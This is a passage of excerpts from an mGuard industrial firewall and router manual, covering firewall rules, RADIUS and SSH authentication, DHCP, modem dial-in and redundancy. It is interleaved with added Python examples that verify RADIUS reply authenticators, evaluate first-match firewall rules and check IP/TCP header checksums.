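        if alen < 2 or pos + alen > len(packet):
            raise ValueError("malformed RADIUS attribute")
        attrs.append((atype, packet[pos + 2:pos + alen]))
        pos += alen
    return attrs


def filter_ids(packet: bytes) -> List[str]:
    return [v.decode("utf-8", "replace") for t, v in parse_attributes(packet) if t == ATTR_FILTER_ID]


def assign_role(ids: List[str], filters: List[Tuple[str, str]]) -> Optional[str]:
    """Search the configured filters top to bottom; the first one present in the reply wins."""
    for filter_id, role in filters:
        if filter_id in ids:
            return role
    return None


def role_from_reply(packet: bytes, request_auth: bytes, secret: bytes,
                    filters: List[Tuple[str, str]]) -> Optional[str]:
    if not verify_response(packet, request_auth, secret):
        return None                      # unauthentic reply: grant nothing
    if packet[0] != ACCESS_ACCEPT:
        return None                      # Access-Reject or Access-Challenge: no role
    return assign_role(filter_ids(packet), filters)


def demo() -> Tuple[Optional[str], Optional[str]]:
    """Constructed exchange: a genuine reply carrying two filter IDs, then the same
    bytes with one filter ID rewritten in transit (same length, wrong authenticator)."""
    secret = b"constructed-example-secret-not-for-real-use"
    request_auth = bytes(range(16))      # stands in for the Access-Request's random authenticator
    reply = build_access_accept(7, request_auth, secret, ["mguard-audit", "mguard-netadmin"])
    genuine = role_from_reply(reply, request_auth, secret, RADIUS_FILTERS)
    forged = reply[:20] + reply[20:].replace(b"mguard-audit", b"mguard-admin")
    return genuine, role_from_reply(forged, request_auth, secret, RADIUS_FILTERS)


if __name__ == "__main__":
    print(demo())
```

The genuine reply yields netadmin, not audit, although audit appears first in the reply: the search order is that of the configured filter list, exactly as the manual states. The forged reply yields no role at all, which is also why the secret must be strong; the authenticator is only as hard to forge as the secret is to guess.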
86. have been defined under the Authentication >> Firewall Users menu (see page 185).

(Screenshot: Network Security >> User Firewall >> BluePrint, tabs General, Template users, Firewall rules. Firewall rules: Source IP authorized_ip; Log ID; rule 1: Protocol TCP, From Port any, To IP 0.0.0.0/0, To Port any, Comment "important", Log Yes.)

Source IP: IP address from which connections are allowed to be established. If this should be the address from which the user logged into the mGuard, the wildcard authorized_ip should be used.

Firewall rules: If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored.

Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols.

From Port / To Port: Only evaluated for TCP and UDP protocols. any refers to any port. startport:endport (e.g. 110:120) refers to a port area. Individual ports can be specified using the port number or the corresponding service name (e.g. 110 for pop3, or pop3 for 110).

To IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).

Comment: Freely selectable comment for this rule.

Log: For each firewall rule you can specify
87. in VPN connections ... 27
3.1.2 Dynamic activation of the firewall rules (conditional firewall) ... 27
3.1.3 Function extension of the Service contacts ... 28
3.1.4 OPC Inspector for Deep Packet Inspection for OPC Classic ... 29
3.1.5 Additional functions ... 29
3.2 Overview of modifications in version 8.0 ... 30
3.2.1 New in CIFS Integrity Monitoring ... 31
3.2.2 VPN extensions ... 31
4 Management menu ... 33
4.1 Management >> System Settings ... 33
4.1.1 Host ... 33
4.1.2 Time and Date ... 35
4.1.3 Shell Access ... 40
4.1.4 E-Mail ... 52
4.2 Management >> Web Settings ... 56
4.2.1 General ... 56
4.2.2 Access ... 57
4.3 Management >> Licensing ... 67
4.3.1 Overview ... 67
4.3.2 Install ...
88. in can be used to access the LAN or the mGuard for configuration purposes (see Modem/Console on page 139).

If the modem is used for dialing out, by acting as the primary external interface (Modem network mode of the mGuard) or as its secondary external interface (when activated in Stealth or Router network mode), it is not available for the PPP dial-in option.

(Screenshot: Network >> Interfaces >> Dial-in. Modem/PPP; Local IP; Remote IP; PPP Login name; PPP Password.)

Network >> Interfaces >> Dial-in

Modem / PPP

Only mGuard rs4000 3G, mGuard rs4000, mGuard industrial rs without built-in modem/ISDN TA, mGuard delta, EAGLE mGuard: Off / On. This option must be set to Off if no serial interface is to be used for the PPP dial-in option. If this option is set to On, the PPP dial-in option is available. The connection settings for the connected external modem should be made on the Modem/Console tab page.

Only for mGuard industrial rs with built-in modem/ISDN TA: Off / Built-in Modem / External Modem. This option must be set to Off if no serial interface should be used for the PPP dial-in option. If this option is set to External Modem, the PPP dial-in option is available. An external modem must then be connected to the serial interface. The connection settings for the connected external modem should be made on the Modem/Console tab page. If t
89. informed of their rejection. In Stealth mode, Reject has the same effect as Drop.
Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts.
Name of rule sets (if defined): When a name is specified for rule sets, the firewall rules saved under this name take effect (see Rule Records tab page).

Comment: Freely selectable comment for this rule.

Log: For each individual firewall rule you can specify whether the use of the rule
• should be logged: set Log to Yes
• should not be logged: set Log to No (default setting)

Log entries for unknown connection attempts: When set to Yes, all connection attempts that are not covered by the rules defined above are logged. Default setting: No.

8.1.3 DMZ

(Screenshot: WAN -> DMZ, Log ID fw-dmz-incoming-wan; rule 1: Interface External, Protocol TCP, From IP 0.0.0.0/0, From Port any, To IP 0.0.0.0/0, To Port any, Action Accept, Log Yes; Log entries for unknown connection attempts Yes. DMZ -> LAN, Log ID fw-dmz-incoming-lan; rule 1: Protocol TCP, From IP 0.0.0.0/0, From Port any, To IP 0.0.0.0/0, To Port any, Action Reject, Log Yes; Log entries for unknown connection
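The rule semantics spelled out on this and the preceding pages (top-down first match with later matching rules ignored, ports evaluated only for TCP and UDP, port areas as startport:endport, service names, CIDR address areas, the Accept/Reject/Drop actions, per-rule logging and the separate log for unknown connection attempts) worked through as an added example; this is not code from the manual or from the mGuard firmware. The rule table and packets in demo() are constructed, the SERVICES lookup table is a stand-in for the system's service-name database, and treating packets that no rule covers as dropped is an assumption of this example (the manual only says such attempts can be logged).

```python
import ipaddress
import socket
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Small service-name table so the example does not depend on the host's /etc/services;
# names not listed here fall back to the system database.
SERVICES = {"ssh": 22, "http": 80, "pop3": 110, "https": 443}


@dataclass(frozen=True)
class Packet:
    proto: str                  # "tcp", "udp", "icmp", "gre", ...
    src: str
    dst: str
    sport: Optional[int] = None
    dport: Optional[int] = None


@dataclass(frozen=True)
class Rule:
    proto: str         # "all" or a protocol name
    from_ip: str       # CIDR; 0.0.0.0/0 means all addresses
    from_port: str     # "any", a number, a service name, or "startport:endport"
    to_ip: str
    to_port: str
    action: str        # "Accept", "Reject" or "Drop"
    log: bool = False
    comment: str = ""


def port_range(spec: str) -> Tuple[int, int]:
    """Translate a port specification into an inclusive (low, high) range."""
    if ":" in spec:
        lo, hi = spec.split(":", 1)
        return int(lo), int(hi)
    if spec.isdigit():
        return int(spec), int(spec)
    port = SERVICES.get(spec) or socket.getservbyname(spec)
    return port, port


def port_matches(spec: str, port: Optional[int]) -> bool:
    if spec == "any":
        return True
    if port is None:
        return False
    lo, hi = port_range(spec)
    return lo <= port <= hi


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    if rule.proto != "all" and rule.proto != pkt.proto:
        return False
    if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule.from_ip, strict=False):
        return False
    if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.to_ip, strict=False):
        return False
    if pkt.proto in ("tcp", "udp"):   # port fields are only evaluated for TCP and UDP
        return port_matches(rule.from_port, pkt.sport) and port_matches(rule.to_port, pkt.dport)
    return True


def evaluate(rules: List[Rule], pkt: Packet, log_unknown: bool) -> Tuple[str, List[str]]:
    """Top-down, first match wins; later rules that would also match are ignored."""
    log: List[str] = []
    for index, rule in enumerate(rules, start=1):
        if rule_matches(rule, pkt):
            if rule.log:
                log.append(f"rule {index} ({rule.comment}) {rule.action}: "
                           f"{pkt.proto} {pkt.src} -> {pkt.dst}:{pkt.dport}")
            return rule.action, log
    if log_unknown:
        log.append(f"unknown connection attempt: {pkt.proto} {pkt.src} -> {pkt.dst}:{pkt.dport}")
    return "Drop", log        # uncovered packets are dropped here (assumption of this example)


def demo() -> Dict[str, Tuple[str, List[str]]]:
    """Constructed rule table and packets; rule 2 would also match the first packet,
    but rule 1 is found first and rule 2 is therefore ignored."""
    rules = [
        Rule("tcp", "0.0.0.0/0", "any", "192.168.1.0/24", "pop3", "Accept", log=True, comment="mail"),
        Rule("tcp", "10.0.0.0/8", "any", "192.168.1.0/24", "110:120", "Reject", comment="plant range"),
        Rule("icmp", "10.0.0.0/8", "any", "192.168.1.0/24", "any", "Accept", comment="ping"),
    ]
    return {
        "pop3_from_plant": evaluate(rules, Packet("tcp", "10.1.2.3", "192.168.1.10", 40000, 110), True),
        "port115_from_plant": evaluate(rules, Packet("tcp", "10.1.2.3", "192.168.1.10", 40001, 115), True),
        "ping_from_plant": evaluate(rules, Packet("icmp", "10.1.2.3", "192.168.1.10"), True),
        "dns_from_elsewhere": evaluate(rules, Packet("udp", "172.16.0.1", "192.168.1.10", 5353, 53), True),
    }


if __name__ == "__main__":
    for name, (action, log) in demo().items():
        print(name, action, log)
```

When auditing a rule table the first-match property is the thing to check: a broad Accept placed above a narrower Reject silently disables the Reject, and the only trace of that is the Accept's own log line, if logging was enabled on it.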
90. is expected, the half-duplex mode is not suitable here.
The time required for the transmission of the ICMP echo request to a target. Consider the latency during periods of high capacity utilization. This applies especially when routers forward the request. The actual latency may be twice the value of the configured latency in unfavorable circumstances (connectivity check error).
The time required on each target for processing the request and transmitting the reply to the Ethernet layer. Please note that the full-duplex mode is also used here.
The time for transmission of the ICMP echo reply to the mGuard.

Table 16.1 Frequency of the ICMP echo requests
Columns: Fail-over switching time | ICMP echo requests per target | Timeout on the mGuard after transmission | Bandwidth per target
(The table rows are not present in the extracted text.)

If secondary targets are configured, then additional ICMP echo requests may occasionally be sent to these targets. This must be taken into account when calculating the ICMP echo request rate.

The timeout for a single ICMP echo request is displayed in Table 16.1. This does not indicate how many of the responses can be missed before the connectivity check fails. The check tolerates a negative result for one of two back-to-back intervals.

Availability check: Presence notifications (CARP) measure up to 76 bytes on layer 3 of the Internet protocol. When VLAN is not used, 18 bytes for the MAC header and checksum are added to this with the Ethernet on la
91. it. To do this it takes data from a local routing table listing assignments between available networks and router connections or intermediate stations.

SNMP: Simple Network Management Protocol is often used alongside other protocols, in particular on large networks. This UDP-based protocol is used for central administration of network devices. For example, the configuration of a device can be requested using the GET command and changed using the SET command; the requested network device must simply be SNMP-compatible. An SNMP-compatible device can also send SNMP messages, e.g. should unexpected events occur. Messages of this type are known as SNMP traps.

A type of seal that certifies the authenticity of a public key (-> asymmetrical encryption) and the associated data. It is possible to use certification to enable the user of the public key used to encrypt the data to ensure that the received public key is indeed from its actual issuer, and thus from the instance that should later receive the data. A certification authority (CA) certifies the authenticity of the public key and the associated link between the identity of the issuer and its key. The certification authority verifies authenticity in accordance with its rules; for example, it may require the issuer of the public key to appear before it in person. After successful authentication the CA adds its digital signature to the issuer's public key. This results in a cert
92. local database on the mGuard. Select Yes to enable users to be authenticated via a RADIUS server. This also applies for users who want to access the mGuard via shell access using SSH or a serial console. The password is only checked locally in the case of the predefined users root, admin, netadmin and audit. The netadmin and audit authorization levels relate to access rights with the mGuard device manager.

Under X.509 Authentication, if you set Enable X.509 certificates for SSH access to Yes, the X.509 authentication procedure can be used as an alternative. Which procedure is actually used by the user depends on how the user uses the SSH client.

When setting up a RADIUS authentication for the first time, select Yes. You should only select "As only method for password authentication" if you are an experienced user, as doing so could result in all access to the mGuard being blocked. If you do intend to use the "As only method for password authentication" option when setting up RADIUS authentication, we recommend that you create a Customized Default Profile which resets the authentication method.

The predefined users root, admin, netadmin and audit are then no longer able to log in to the mGuard via SSH or serial console. There is one exception: it is still possible to perform authentication via an externally accessible serial console by correctly entering the local password for the root user name.
93. login session could then be used by an intruder who uses this old IP address of the authorized user and accesses the mGuard using this sender address. The same thing could also occur if an authorized firewall user forgets to log out at the end of a session. This hazard of logging in via an unsecure interface is not completely eliminated, but the time is limited by setting the configured timeout for the user firewall template used (see Timeout type on page 227).

Authentication >> Firewall Users >> Access

Interface: External / Internal / External 2 / Dial-in / DMZ. Specifies which mGuard interfaces can be used by firewall users to log into the mGuard. For the interface selected, web access via HTTPS must be enabled (Management >> Web Settings menu, Access tab page, see Access on page 57). In Stealth network mode, both the Internal and External interfaces must be enabled so that firewall users can log into the mGuard. Two rows must be entered in the table for this. External 2 and Dial-in are only for devices with a serial interface (see Network >> Interfaces on page 105). DMZ is only for devices with a DMZ interface.

7.2.3 Status

When the user firewall is activated, its status is displayed here.

(Screenshot: Authentication >> Firewall Users, tabs Firewall Users, Access, Status.)
94. mGuard rs4000/rs2000, mGuard delta, mGuard pci SD, mGuard pcie SD: insert the SD card into the SD slot at the front.
• If the root password on the mGuard onto which the profile is going to be subsequently loaded is not "root", this password must be entered in the "The root password to save to the ECS" field.
• Click on Save. For EAGLE mGuard, the LED STATUS and LED V.24 flash until the saving process is complete.

Loading a profile from an external storage medium
• EAGLE mGuard: connect the ECS to the V.24 socket (ACA11) or USB socket (ACA21). Type ACA21 ECS are not suitable for manual modifications by a computer or similar.
• mGuard centerport and EAGLE mGuard with USB interface: insert the USB stick into the USB socket.
• mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard delta, mGuard pci SD, mGuard pcie SD: insert the SD card into the SD slot at the front.
• Once the storage medium has been inserted, start the mGuard.
• The mGuard root password must either be "root" or correspond to the password that was specified while the profile was being saved. For EAGLE mGuard, the LED STATUS and LED V.24 flash until the saving process is complete.
The configuration profile loaded from the storage medium is loaded onto the mGuard and applied.

The loaded configuration profile does not appear in the list of configuration profiles stored on the mGuard
95. network provider. Only visible when PPP authentication is set to Yes.
Enter the PAP or CHAP user password to log onto the access gateway of the mobile network provider. This information can be obtained from your mobile network provider. Only visible when PPP authentication is set to Yes.
See Primary SIM slot. Indicates the duration in hours until the device switches back to SIM 1 from SIM 2. If set to 0, SIM 2 remains active until the device dials into the mobile network again. Values: 0..24 hours.

6.7.3 Text message / Notifications

The mGuard rs4000/rs2000 3G can send and receive text messages. Text messages can be sent via the following mechanisms:
• Web interface
• Console
Text messages can be sent to freely definable mobile network recipients for selectable events. A complete list of all events can be found at Event table on page 53.

You can also send a text message via the console. To do so, you must enter the recipient number, followed by a space, and then add the message:
/Packages/mguard-api_0/mbin/action gsm/sms <recipient number> <message>

Incoming text messages can be used to control VPN connections.

(Screenshot: Network >> Mobile Network, tabs General, SIM Settings, Text message/Notifications, Positioning system. Text message notifications: number; event "Activation state of a Firewall rule record" changed to ...)
96. on the LAN adapter icon and select Properties from the context menu.
• On the General tab, select Internet Protocol (TCP/IP) under "This connection uses the following items", then click on Properties.
• Make the appropriate entries and settings in the Internet Protocol (TCP/IP) Properties dialog box.

6.5.1 Internal/External DHCP

(Screenshot: Network >> DHCP, tabs Internal DHCP, External DHCP. DHCP Mode: DHCP mode Disabled; selectable values Disabled, Server, Relay.)

Network >> DHCP >> Internal DHCP

DHCP Mode

DHCP mode: Disabled / Server / Relay.
Set this option to Server if the mGuard is to operate as an independent DHCP server. The corresponding setting options are then displayed below on the tab page (see Server).
Set this option to Relay if the mGuard is to forward DHCP requests to another DHCP server. The corresponding setting options are then displayed below on the tab page (see Relay).
In mGuard Stealth mode, Relay DHCP mode is not supported. If the mGuard is in Stealth mode and Relay DHCP mode is selected, this setting will be ignored. However, DHCP requests from the computer and the corresponding responses are forwarded due to the nature of Stealth mode.
If this option is set to Disabled, the mGuard does not answer any DHCP requests.

Server: If DHCP mode is set to Server, the corresponding setting options
97. packets are actually to be transferred. It also instructs the modem to terminate the telephone connection as soon as no more network packets are to be transmitted for a specific time (see value in Idle timeout field). By doing this, however, the mGuard is not constantly available externally, i.e. for incoming data packets. Network >> Interfaces >> Dial-out. The mGuard also often or sporadically establishes a connection via the modem, or keeps a connection longer, if the following conditions apply: Often: the mGuard is configured so that it synchronizes its system time (date and time) regularly with an external NTP server. Sporadically: the mGuard acts as a DNS server and must perform a DNS request for a client. After a restart: an active VPN connection is set to Started. If this is the case, the mGuard establishes a connection after every restart. After a restart: for an active VPN connection, the gateway of the partner is specified as the host name. After a restart, the mGuard must request the IP address that corresponds to the host name from a DNS server. Often: VPN connections are set up and DPD messages are sent regularly (see Dead Peer Detection on page 282). Often: the mGuard is configured to send its external IP address regularly to a DNS service (e.g. DynDNS) so that it can still be accessed via its host name
98. parity; 2 stop bits, odd parity. COM Server: Allowed Networks. Access rules can be defined for the COM server to prevent unauthorized access to it. The default rule does not allow any access via the external interface. From IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Interfaces: Interface for which the rule should apply. Values: None, External, DMZ, VPN. Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back; the sender is informed of their rejection. Drop means that the data packets are not permitted to pass through; the sender is not informed of their whereabouts. Comment: Freely selectable comment for this rule. Log: For each firewall rule, you can specify whether the event is to be logged if the rule is applied. Primary External Interface / Secondary External Interface / PPP dial-in options. Network menu. For the mGuard industrial rs with built-in modem / built-in ISDN modem (ISDN terminal adapter): The mGuard industrial rs is available with a built-in analog modem or built-in ISDN terminal adapter as an option. The built-in modem or built-in ISDN terminal adapter can be used as follows: As a primary external interface, if the network mode is set to Built-in Modem under Network >> Interfaces on the Gener
99. queries from client programs or client computers. In data communication, the computer establishing a connection to a server or host is also called a client. In other words, the client is the calling computer and the server or host is the computer called. In the IP transmission protocol, data is sent in the form of data packets. These are known as IP datagrams. An IP datagram is structured as follows: IP header | TCP/UDP/ESP etc. header | Data (payload). The IP header contains: the IP address of the sender (source IP address); the IP address of the recipient (destination IP address); the protocol number of the protocol on the superordinate protocol layer (according to the OSI layer model); the IP header checksum, used to check the integrity of the received header. The TCP/UDP header contains the following information: the port of the sender (source port); the port of the recipient (destination port); a checksum covering the TCP header and information from the IP header (e.g. source and destination IP addresses). If a computer is connected to a network, the operating system creates a routing table internally. The table lists the IP addresses that the operating system has identified based on the connected computers and the routes available at that time. Accordingly, the routing table contains the possible routes (destinations) for sending IP packets. If IP packets are to be sent, the computer's operating system comp
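An added example, not from the manual, that decodes the header fields just listed from a constructed IPv4/TCP packet and verifies both checksums (the IP header checksum, and the TCP checksum that also covers the IP source and destination via a pseudo-header). The function names and the sample addresses and ports are my own.

```python
"""Added example (not from the mGuard manual): parse the IP and TCP header
fields named in the text from raw bytes and verify their checksums."""
import struct
from ipaddress import IPv4Address


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum as used by the IP and TCP checksums."""
    if len(data) % 2:
        data += b"\x00"          # an odd trailing byte is padded with zero
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:           # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    """Checksum to place in the header; recomputing over a valid header gives 0."""
    return (~ones_complement_sum(data)) & 0xFFFF


def parse_ipv4(packet: bytes) -> dict:
    """Return the IP header fields the text lists plus the encapsulated segment."""
    ver_ihl, _tos, total_len, _ident, _ff, _ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4    # header length in bytes, options included
    if ver_ihl >> 4 != 4 or ihl < 20 or ihl > len(packet):
        raise ValueError("not a well-formed IPv4 header")
    return {
        "src": str(IPv4Address(src)),
        "dst": str(IPv4Address(dst)),
        "protocol": proto,            # 6 = TCP, 17 = UDP, 50 = ESP
        "header_ok": checksum(packet[:ihl]) == 0,
        "payload": packet[ihl:total_len],
    }


def parse_tcp(ip: dict) -> dict:
    """Return the TCP ports and verify the checksum, which covers the whole
    segment plus a pseudo-header built from the IP addresses and protocol."""
    seg = ip["payload"]
    sport, dport = struct.unpack("!HH", seg[:4])
    pseudo = (IPv4Address(ip["src"]).packed + IPv4Address(ip["dst"]).packed
              + struct.pack("!BBH", 0, ip["protocol"], len(seg)))
    return {"sport": sport, "dport": dport,
            "segment_ok": checksum(pseudo + seg) == 0}


def build_tcp_packet(src: str, dst: str, sport: int, dport: int,
                     payload: bytes = b"") -> bytes:
    """Constructed sample data: a minimal IPv4/TCP SYN with valid checksums."""
    src_b, dst_b = IPv4Address(src).packed, IPv4Address(dst).packed
    # TCP header: ports, seq, ack, data offset 5 words, SYN flag, window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    tcp += payload
    pseudo = src_b + dst_b + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IP header: version 4 / IHL 5, DF flag, TTL 64, protocol 6 (TCP)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000,
                      64, 6, 0, src_b, dst_b)
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + tcp


if __name__ == "__main__":
    pkt = build_tcp_packet("192.168.1.10", "10.0.0.5", 40000, 443, b"hello")
    ip = parse_ipv4(pkt)
    print(ip["src"], "->", ip["dst"], "proto", ip["protocol"], ip["header_ok"])
    print(parse_tcp(ip))
    damaged = pkt[:12] + bytes([pkt[12] ^ 0x01]) + pkt[13:]   # one bit in src
    print("damaged header accepted:", parse_ipv4(damaged)["header_ok"])
```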
100. rules are ignored. The rules specified here only take effect if Enable HTTPS remote access is set to Yes. Internal access is also possible when this option is set to No. A firewall rule that would refuse Internal access does therefore not apply in this case. The following options are available: From IP: Enter the address of the computer or network from which remote access is permitted or forbidden in this field. IP address 0.0.0.0/0 means all addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Interface: Specifies to which interface the rule should apply: External, Internal, External 2, VPN, Dial-in. Specify the access options according to your requirements. If you want to refuse access via Internal, VPN or Dial-in, you must implement this explicitly by means of corresponding firewall rules, for example by specifying Drop as an action. To prevent your own access being blocked, you may have to permit access simultaneously via another interface explicitly with Accept before clicking on the Apply button to activate the new setting. Otherwise, if your access is blocked, you must carry out the recovery procedure. If no rules are set or if no rule applies, the following default settings apply: HTTPS access is permitted via Internal, VPN and Dial-in. Access via External and External 2 is refused.
101. (see Authentication >> Certificates). If the use of revocation lists (CRL checking) is activated under the Authentication >> Certificates, Certificate settings menu item, each certificate signed by a CA that is shown by SSH clients is checked for revocations. Management >> System Settings >> Shell Access. CA certificate: This configuration is only necessary if the SSH client shows a certificate signed by a CA. All CA certificates required by the mGuard to form the chain to the relevant root CA certificate with the certificates shown by the SSH client must be configured. The selection list contains the CA certificates that have been loaded on the mGuard under the Authentication >> Certificates menu item. X.509 subject: Enables a filter to be set in relation to the contents of the Subject field in the certificate shown by the SSH client. It is then possible to limit or enable access for SSH clients which the mGuard would accept based on certificate checks: Limited access to certain subjects (i.e. individuals) and/or to subjects that have certain attributes, or Access enabled for all subjects. See glossary under Subject, certificate on page 360. The X.509 subject field must not be left empty. Management >> System Settings >> Shell Access. Access enabled for all subjects (i.e. ind
102. system time field. Synchronized by file system time stamp: The administrator has set the Time stamp in filesystem setting to Yes and has either transmitted the current system time to the mGuard via NTP (see below under NTP Server) or has entered it under Local system time. The system time of the mGuard is then synchronized using the time stamp after a restart, even if it has no built-in clock, and is set exactly again afterwards via NTP. Synchronized by Network Time Protocol (NTP): The administrator has activated NTP time synchronization under NTP Server, has entered the address of at least one NTP server, and the mGuard has established a connection with at least one of the specified NTP servers. If the network is working correctly, this occurs a few seconds after a restart. The display in the NTP State field may only change to synchronized much later (see the explanation below under NTP State). Synchronized by GPS data: The mGuard rs4000/rs2000 3G can set and synchronize the system time via the positioning system (GPS/GLONASS) under Network >> Mobile Network >> Positioning system. Management >> System Settings >> Time and Date: NTP Server; Local system time; Timezone in POSIX.1 notation; Time stamp in filesystem. Here you can set the time for the mGuard if no NTP server has been set up or the NTP server cannot be
103. targets for ICMP echo requests. If "at least one target must respond" or "all targets of one set must respond" is selected under External interface >> Kind of check, then External interface >> Primary targets for ICMP echo requests cannot be left empty. This also applies to the internal interface. In Router network mode, at least one external and one internal virtual IP address must be set. A virtual IP address cannot be listed twice. Redundancy. 16.1.5 Fail-over switching time. The mGuard calculates the intervals for the connectivity check and availability check automatically according to the variables under Fail-over switching time. Connectivity check: The factors which define the intervals for the connectivity check are specified in Table 16-1 on page 335. 64 kbyte ICMP echo requests are sent for the connectivity check. They are sent on layer 3 of the Internet protocol. When VLAN is not used, 18 bytes for the MAC header and checksum are added to this with the Ethernet on layer 2. The ICMP echo reply is the same size. The bandwidth is also shown in Table 16-1. This takes into account the values specified for a single target and adds up the bytes for the ICMP echo request and reply. The timeout on the mGuard following transmission includes the following: The time required by the mGuard to transmit an ICMP echo reply. If other data traffic
104. that a browser on the remote computer is used to configure the mGuard. This option is disabled by default. NOTE: If remote access is enabled, ensure that secure passwords are defined for root and admin. To enable HTTPS remote access, make the following settings: Management >> Web Settings >> Access. HTTPS Web Access. Enable HTTPS remote access (No/Yes): If you want to enable HTTPS remote access, set this option to Yes. Internal HTTPS remote access, i.e. from the directly connected LAN or from the directly connected computer, can be enabled independently of this setting. The firewall rules for the available interfaces must be defined on this page under Allowed Networks in order to specify differentiated access options on the mGuard. In addition, the authentication rules under User authentication must be set if necessary. Remote HTTPS TCP Port (remote administration only): Default: 443. If this port number is changed, the new port number only applies for access via the External, External 2, VPN and Dial-in interface. Port number 448 still applies for internal access. The remote partner that implements remote access may have to specify the port number defined here after the IP address during entry of the address. Example: if this mGuard can be accessed over the Internet via address 123.124.125.21 and port number 443 has been specified for remote
105. the connection fails. The primary mGuard becomes active again after the failure has been rectified. The secondary mGuard receives a presence notification (CARP) and returns to standby mode. State synchronization: If the primary mGuard becomes active again after a failure of the internal network connection, it may contain an obsolete copy of the firewall database. This database must therefore be updated before the connection is reestablished. The primary mGuard ensures that it receives an up-to-date copy before becoming active. 16.1.8 Interaction with other devices. Virtual and actual IP addresses: With firewall redundancy in Router network mode, the mGuard uses actual IP addresses to communicate with other network devices. Virtual IP addresses are used in the following two cases: Virtual IP addresses are used when establishing and operating VPN connections. If DNS and NTP services are used according to the configuration, they are offered to internal virtual IP addresses. The usage of actual management IP addresses is especially important for the connectivity check and availability check. Therefore, the actual management IP address must be configured so that the mGuard can establish the required connections. The following are examples of how and why mGuard communication takes place: Communication with NTP servers to synchronize the time. Communication with DNS servers to resolve host names, especially those from
106. this causes an expired session to be detected and removed after six minutes. In previous versions the preset was 0. This means that no requests for a sign of life are sent. If it is important not to generate additional traffic, you can adjust the value. When the setting 0 is made in conjunction with Concurrent Session Limits, subsequent access may be blocked if too many sessions are interrupted but not closed as a result of network errors. Management >> System Settings >> Shell Access. Maximum number of missing signs of life: Specifies the maximum number of times a sign of life request to the partner may remain unanswered. For example, if a sign of life request should be made every 15 seconds and this value is set to 3, the SSH connection is deleted if a sign of life is still not detected after approximately 45 seconds. Update SSH and HTTPS keys: Generate new 2048-bit keys. Keys that have been generated using an older firmware might be weak and should be renewed. Click on this button to generate a new key. Observe the fingerprints of the new keys generated. Login via HTTPS and compare the certificate information provided by the browser. Concurrent Session Limits: In the case of administrative access to the mGuard via SSH, the number of simultaneous sessions is limited depending on the predefined user. Approximately 0.5 Mbytes of memory spac
107. which sounds should be emitted by the mGuard speaker and at what volume. Network menu. For the mGuard industrial rs with built-in ISDN terminal adapter: External Modem: Hardware handshake; Baudrate 57600; Handle modem transparently for dial-in only; Modem init string. Built-in Modem/ISDN (additionally for the mGuard industrial rs with built-in modem): 1st MSN; 2nd MSN; ISDN protocol (EuroISDN/NET3); Layer 2 protocol (PPP / ML-PPP). Network >> Interfaces >> Modem/Console for the mGuard industrial rs with ISDN terminal adapter. External Modem: As for the mGuard rs4000, mGuard industrial rs without built-in modem, mGuard centerport, mGuard blade, mGuard delta, EAGLE mGuard. Configuration as above for External Modem (see External Modem on page 141). Built-in Modem/ISDN: 1st MSN: For outgoing calls, the mGuard transmits the MSN (Multiple Subscriber Number) entered here to the called partner. In addition, the mGuard can receive incoming calls via this MSN, provided dial-in operation is enabled (see General tab page). Maximum of 25 alphanumeric characters; the following special characters can be used: colon. 2nd MSN: If the mGuard should also receive incoming calls via another number for dial-in operation (if enabled), enter the second MSN here. ISDN protocol: The EuroISDN protocol (also known as NET3) is used in Germany and many other European countr
108. [CIDR table, binary column] 192.168.1.0/255.255.255.0 corresponds to CIDR 192.168.1.0/24. Configuration help. 2.6 Network example diagram. The following diagram shows how IP addresses can be distributed in a local network with subnetworks, which network addresses result from this, and how the details regarding additional internal routes may look for the mGuard. [Diagram: Internet; external address e.g. 123.456.789.211 (assigned by the Internet service provider); mGuard in Router network mode, internal address of the mGuard 192.168.11.1; Switch; Network A: network address 192.168.11.0/24, subnet mask 255.255.255.0, computers A1, A2, A3, A4, A5; Router: external IP address 192.168.11.2, internal IP address 192.168.15.254, subnet mask 255.255.255.0; Switch; Network B: network address 192.168.15.0/24, subnet mask 255.255.255.0; Router: external IP address 192.168.15.1, internal IP address 192.168.27.254, subnet mask 255.255.255.0; Switch; Network C: network address 192.168.27.0/24, subnet mask 255.255.255.0; additional internal routes for the mGuard]
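As an added example (not part of the manual), the netmask/CIDR conversion the CIDR table is about, together with the additional internal routes the mGuard at 192.168.11.1 needs for the example diagram; the function names, and my reading of the diagram that the router at 192.168.11.2 is the gateway for both network B and network C, are my own.

```python
"""Added example (not from the mGuard manual): netmask <-> CIDR prefix
conversion, and a longest-prefix route lookup over the diagram's networks."""
from ipaddress import IPv4Address, IPv4Network


def netmask_to_prefix(mask: str) -> int:
    """255.255.255.0 -> 24. Rejects non-contiguous masks such as 255.0.255.0."""
    bits = int(IPv4Address(mask))
    prefix = bin(bits).count("1")
    # A valid mask is `prefix` ones followed by zeros, the pattern the CIDR
    # table lists (11111111 ... 11100000 ... 00000000).
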